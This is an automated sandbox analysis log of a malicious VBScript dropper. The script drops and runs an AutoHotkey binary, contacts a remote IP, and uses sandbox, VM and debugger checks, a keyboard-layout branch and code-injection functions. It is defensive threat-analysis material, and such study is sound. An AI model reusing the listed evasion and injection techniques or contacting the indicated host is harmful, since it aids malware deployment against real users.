Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fykbmgsz[1] Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe File created: C:\temp\ Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs"
Source: C:\NwiQ\AutoHotkey.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ndvdikok.vbs Virustotal: Detection: 15%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"
Source: C:\Windows\System32\wscript.exe Process created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: zipfldr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winshfhc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wdscore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winshfhc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wdscore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: winmm.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: version.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: wininet.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: netutils.dll Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run(""c:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"", "1", "false");
Contains functionality to dynamically determine API calls
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A5040 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004A5040
Uses code obfuscation techniques (call, push, ret)
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0049F0E5 push ecx; ret 1_2_0049F0F8
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004AB418 push eax; ret 1_2_004AB436
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04878489 push 048784B5h; ret 1_2_048784AD
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0485F4A5 push 0485F4D1h; ret 1_2_0485F4C9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489A4A9 push 0489A4EBh; ret 1_2_0489A4E3
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048954E5 push 04895511h; ret 1_2_04895509
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486F4E9 push 0486F515h; ret 1_2_0486F50D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048724F9 push ecx; mov dword ptr [esp], ecx 1_2_048724FE
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486D419 push 0486D445h; ret 1_2_0486D43D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0487146D push 048714D7h; ret 1_2_048714CF
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486E471 push 0486E4B3h; ret 1_2_0486E4AB
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04868505 push 04868531h; ret 1_2_04868529
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489A52D push 0489A559h; ret 1_2_0489A551
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04878531 push 0487855Dh; ret 1_2_04878555
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484E565 push 0484E6E1h; ret 1_2_0484E6D9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A691 push 0486A6BDh; ret 1_2_0486A6B5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048966A5 push 048966D1h; ret 1_2_048966C9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048676C5 push 048676F1h; ret 1_2_048676E9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A6C9 push 0486A6F5h; ret 1_2_0486A6ED
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484E6E5 push 0484E754h; ret 1_2_0484E74C
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484E6E3 push 0484E754h; ret 1_2_0484E74C
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048676FD push 04867729h; ret 1_2_04867721
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04858615 push ecx; mov dword ptr [esp], edx 1_2_04858617
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04896629 push 0489665Ch; ret 1_2_04896654
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486578D push 048657B6h; ret 1_2_048657AE
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04867795 push 048677C1h; ret 1_2_048677B9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489779D push 048977DDh; ret 1_2_048977D5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489E791 push 0489E7B7h; ret 1_2_0489E7AF
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484E79D push 0484E7C9h; ret 1_2_0484E7C1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048677CD push 048677F9h; ret 1_2_048677F1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0485B7D9 push 0485B805h; ret 1_2_0485B7FD
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\NwiQ\AutoHotkey.exe Jump to dropped file
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00484030 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow, 1_2_00484030
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00484160 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop, 1_2_00484160
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004442E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free, 1_2_004442E0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045C3A0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,__swprintf, 1_2_0045C3A0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004813B0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen, 1_2_004813B0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00481410 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen, 1_2_00481410
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004427E0 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongW,__swprintf,GetModuleHandleW,GetProcAddress,__swprintf, 1_2_004427E0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0046C900 GetWindowLongW,GetWindowLongW,GetWindowLongW,__wcsnicmp,__wcsnicmp,__wcsicoll,SetWindowPos,__wcsicoll,__wcsicoll,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,EnableWindow,__wcsnicmp,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsnicmp,MulDiv,MulDiv,__wcsnicmp,MulDiv,MulDiv,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcstoi64,IsWindow,SetParent,SetWindowLongW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect, 1_2_0046C900
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00443AD0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,__swprintf,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC, 1_2_00443AD0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00446BC0 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,_memset,EnumChildWindows,GetClassNameW,EnumChildWindows, 1_2_00446BC0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00473B90 SendMessageW,SendMessageW,SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageW,SendMessageW,ShowWindow,SetFocus,InvalidateRect,InvalidateRect,InvalidateRect,MapWindowPoints,InvalidateRect, 1_2_00473B90
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0046FCD0 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus, 1_2_0046FCD0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0046FCD0 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus, 1_2_0046FCD0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00445D30 SendMessageW,SendMessageW,SendMessageW,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW, 1_2_00445D30
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0485D5DD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0485D5DD
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found evaded block containing many API calls
Source: C:\NwiQ\AutoHotkey.exe Evaded block: after key decision
Found large amount of non-executed APIs
Source: C:\NwiQ\AutoHotkey.exe API coverage: 3.0 %
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004191F0 GetKeyboardLayout followed by cmp: cmp cl, 00000019h and CTI: ja 004192ECh country: Russian (ru) 1_2_004191F0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0040C240 GetKeyboardLayout followed by cmp: cmp dword ptr [004db42ch], edi and CTI: je 0040C414h 1_2_0040C240
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00480DC0 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose, 1_2_00480DC0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize, 1_2_0045E220
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0047C320 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle, 1_2_0047C320
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044D570 FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__swprintf,FindNextFileW,FindClose, 1_2_0044D570
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044D870 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime, 1_2_0044D870
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00437B70 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose, 1_2_00437B70
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044DBB0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0044DBB0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00480D30 FindFirstFileW,FindClose,GetFileAttributesW, 1_2_00480D30
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045EEA0 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,_wcsrchr,_wcsrchr,_wcsncpy,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose, 1_2_0045EEA0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048495A1 FindFirstFileA,GetLastError, 1_2_048495A1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489C541 FindFirstFileW,FindNextFileW,FindClose, 1_2_0489C541
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484655D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 1_2_0484655D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489B145 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose, 1_2_0489B145
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04876FE5 FindFirstFileW,FindNextFileW,FindClose, 1_2_04876FE5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04873871 FindFirstFileW,FindNextFileW,FindClose, 1_2_04873871
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04871EA9 GetSystemInfo, 1_2_04871EA9
Source: AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: wscript.exe, 00000000.00000003.1651614571.000001D5A5F25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Registry\Machine\Software\Classes\SystemFileAssociations\compressed\SystemFileAssociations\compressed}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}stem32
Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: microsoft hyper-v video
Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660535194.000001D5A5EE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: AutoHotkey.exe, 00000001.00000002.1665231870.0000000000ACB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\NwiQ\AutoHotkey.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00416450 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput, 1_2_00416450
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0049E2D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0049E2D5
Contains functionality to dynamically determine API calls
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A5040 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004A5040
Contains functionality to read the PEB
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A0F5 mov eax, dword ptr fs:[00000030h] 1_2_0486A0F5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A0F5 mov eax, dword ptr fs:[00000030h] 1_2_0486A0F5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04867B0D mov eax, dword ptr fs:[00000030h] 1_2_04867B0D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048B3EEA mov eax, dword ptr fs:[00000030h] 1_2_048B3EEA
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A93DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 1_2_004A93DE
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0049E2D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0049E2D5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A1856 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_004A1856

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: AutoHotkey.exe.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 205.234.201.153 80 Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486DC09 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle, 1_2_0486DC09
Contains functionality to inject threads in other processes
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486DC09 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle, 1_2_0486DC09
Contains functionality to launch a program with higher privileges
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0043B100 GetFileAttributesW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,__swprintf,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW, 1_2_0043B100
Contains functionality to simulate keystroke presses
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00418020 keybd_event,GetTickCount,GetForegroundWindow,GetWindowTextW, 1_2_00418020
Contains functionality to simulate mouse events
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004172F0 GetAsyncKeyState,GetSystemMetrics,GetSystemMetrics,GetCursorPos,WindowFromPoint,GetWindowThreadProcessId,SendMessageW,mouse_event,mouse_event, 1_2_004172F0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk" Jump to behavior
